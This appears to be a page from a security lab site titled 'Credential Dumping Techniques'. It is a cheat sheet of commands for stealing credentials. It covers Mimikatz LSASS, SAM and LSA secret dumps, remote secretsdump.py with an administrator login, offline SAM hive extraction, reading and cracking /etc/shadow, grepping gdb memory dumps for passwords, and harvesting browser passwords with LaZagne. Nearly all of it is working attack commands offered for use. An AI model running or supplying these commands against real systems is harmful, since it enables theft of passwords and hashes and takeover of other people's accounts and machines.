⚠️ Pracivo Security Lab — Hash identification, cracking techniques, Hashcat and John the Ripper guides.
Credential Dumping Techniques
# WINDOWS — Mimikatz (must run as SYSTEM/Admin)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # Dump from LSASS memory (plaintext + hashes)
sekurlsa::wdigest # Force plaintext (disable WDigest protection first)
lsadump::sam # Dump SAM database
lsadump::lsa /patch # Dump LSA secrets
# WINDOWS — secretsdump.py (remote, from Linux)
python3 secretsdump.py corp.local/administrator:Admin@2024@192.168.1.10
python3 secretsdump.py -hashes :NTLM_HASH corp.local/administrator@192.168.1.10
# WINDOWS — Local SAM dump (offline)
# Boot from USB, copy files:
reg save HKLM\SAM C:\temp\sam
reg save HKLM\SYSTEM C:\temp\system
# Then on Linux:
python3 secretsdump.py -sam sam -system system LOCAL
# LINUX — /etc/shadow (need root)
cat /etc/shadow
# Format: user:$6$salt$hash:...
# Crack: hashcat -m 1800 shadow.txt rockyou.txt
# LINUX — memory dump with gdb
# Find process with credentials loaded in memory:
ps aux | grep "app\|node\|python"
gdb -p PID
dump memory /tmp/dump.bin 0x0 0xffffffff
strings /tmp/dump.bin | grep -i "password\|secret\|key"
# BROWSERS — extract saved passwords
# Chrome: C:\Users\%USER%\AppData\Local\Google\Chrome\User Data\Default\Login Data
# Firefox: C:\Users\%USER%\AppData\Roaming\Mozilla\Firefox\Profiles\
# Use: LaZagne.exe browsers